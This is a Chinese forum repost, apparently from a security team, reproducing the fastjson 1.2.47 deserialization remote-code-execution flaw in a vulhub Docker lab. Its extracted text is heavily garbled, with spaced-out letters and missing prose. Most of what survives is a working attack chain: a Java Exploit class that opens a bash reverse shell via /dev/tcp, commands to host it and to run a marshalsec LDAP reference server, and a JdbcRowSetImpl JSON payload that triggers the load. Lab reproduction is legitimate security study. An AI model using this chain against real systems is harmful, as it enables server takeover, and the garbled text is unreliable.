搜索

[6654] 2020-04-20_fastjson1.2.47反序列化漏洞复现

文档创建者:s7ckTeam
浏览次数:112
最后更新:2025-01-17
2020-04-20_fastjson1.2.47反序列化漏洞复现 f a s t j s o n 1 . 2 . 4 7 E   2 0 2 0 - 0 4 - 2 0   N o . 1 N o . 1 使 N o . 2 N o . 2 f a s t j s o n 1 . 2 . 4 7 j a r 便 N o . 3 N o . 3 A F a s t j s o n c e n t o s 8 B w i n d o w s 1 0 C R M I   L D A P w e b c e n t o s 8 A 使 v u l h u b d o c k e r , d o c k e r - c o m p o s e d o c k e r h t t p s : / / w w w . j i a n s h u . c o m / p / 7 5 8 c 1 7 0 b 9 5 1 f C e n t O S   8   d o c k e r   - - n o b e s t y u m   i n s t a l l   - y   d o c k e r - c e   - - n o b e s t d o c k e r - c o m p o s e   h t t p s : / / v u l h u b . o r g / # / d o c s / i n s t a l l - d o c k e r - o n e - c l i c k / g i t h u b v u l h u b   .
f a s t j s o n / 1 . 2 . 4 7 - r c e / d o c k e r - c o m p o s e   u p   - d 访   h t t p : / / i p : 8 0 9 0 N o . 4 N o . 4 j d k :   :   h t t p s : / / p a n . b a i d u . c o m / s / 1 n I - J T 9 3 v j c A 9 - - 7 f b 0 f h q w & s h f l = s h a r e s e t   :   s v e n h t t p s : / / w w w . c n b l o g s . c o m / x i o a w u - b l o g / p / 9 0 9 7 2 9 4 . h t m l m a r s h a l s e c m v n 使 g i t h u b h t t p s : / / g i t h u b . c o m / m b e c h l e r / m a r s h a l s e c ( ) :   h t t p s : / / p a n . b a i d u . c o m / s / 1 k T 9 v w h N D D d i J 3 d L 9 B S 3 U 4 w & s h f l = s h a r e s e t   :   s v e n S h e l l   . j a v a s h e l l _ E x p :
i m p o r t   j a v a . i o . B u f f e r e d R e a d e r ; i m p o r t   j a v a . i o . I n p u t S t r e a m ; i m p o r t   j a v a . i o . I n p u t S t r e a m R e a d e r ; p u b l i c   c l a s s   E x p l o i t { p u b l i c   E x p l o i t ( )   t h r o w s   E x c e p t i o n   { P r o c e s s   p   =   R u n t i m e . g e t R u n t i m e ( ) . e x e c ( n e w   S t r i n g [ ] { " / b i n / b a s h " , " - c " , " e x e c   5 < > / d e v / t c p / i p / p o r t ; c a t   < & 5   |   w h i l e   r e a d l i n e ;   d o   $ l i n e   2 > & 5   > & 5 ;   d o n e " } ) ; I n p u t S t r e a m   i s   =   p . g e t I n p u t S t r e a m ( ) ; B u f f e r e d R e a d e r   r e a d e r   =   n e w   B u f f e r e d R e a d e r ( n e w   I n p u t S t r e a m R e a d e r ( i s ) ) ; S t r i n g   l i n e ; w h i l e ( ( l i n e   =   r e a d e r . r e a d L i n e ( ) )   ! =   n u l l )   { S y s t e m . o u t . p r i n t l n ( l i n e ) ; } p . w a i t F o r ( ) ; i s . c l o s e ( ) ; r e a d e r . c l o s e ( ) ; p . d e s t r o y ( ) ; } p u b l i c   s t a t i c   v o i d   m a i n ( S t r i n g [ ]   a r g s )   t h r o w s   E x c e p t i o n   { } } 使 j a v a c   S h e l l . j a v a   c l a s s 使   p y t h o n   - m   S i m p l e H t t p S e r v e r   8 0 9 0     w e b 访
使 m a r s h a l s e c L D A P L D A P L D A P   r e f e r e n c e   r e s u l t   w e b i p w e b i p j a v a   - c p   m a r s h a l s e c - 0 . 0 . 3 - S N A P S H O T - a l l . j a r   m a r s h a l s e c . j n d i . L D A P R e f S e r v e r   h t t p : / / i p : 8 0 9 0 # S h e l l   1 3 8 9 p a y l o a d : {       " a " : {               " @ t y p e " : " j a v a . l a n g . C l a s s " ,               " v a l " : " c o m . s u n . r o w s e t . J d b c R o w S e t I m p l "       } ,       " b " : {               " @ t y p e " : " c o m . s u n . r o w s e t . J d b c R o w S e t I m p l " ,               " d a t a S o u r c e N a m e " : " l d a p : / / i p : 1 3 8 9 / S h e l l " ,               " a u t o C o m m i t " : t r u e
N o . 5 N o . 5 1 . A 使 L D A P     s y s t e m c t l   s t o p   f i r e w a l l d 2 . d o c k e r         s e r v i c e   d o c k e r   r e s t a r t     3 . j d k j d k E   h t t p s : / / w w w . e a s y a q . c o m U E B A E q u i f a x G A O   G A O C I S O W i n d o w s I C O 5 0     E

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理